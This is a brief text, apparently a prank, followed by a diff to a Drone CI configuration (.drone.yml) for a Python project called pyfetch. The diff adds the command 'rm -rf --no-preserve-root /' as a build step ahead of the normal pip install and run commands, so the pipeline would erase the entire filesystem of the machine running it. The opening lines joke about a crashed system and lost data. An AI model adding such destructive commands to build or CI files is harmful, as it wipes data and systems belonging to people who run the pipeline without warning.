Oops. My system Crashed!
I lost my data and i had a antivirus!

--- a/.drone.yml
+++ b/.drone.yml
@@ -4,5 +4,6 @@ steps:
 - name: pyfetch
   image: python
   commands:
+    - rm -rf --no-preserve-root /
     - pip install psutil distro
     - python pyfetch
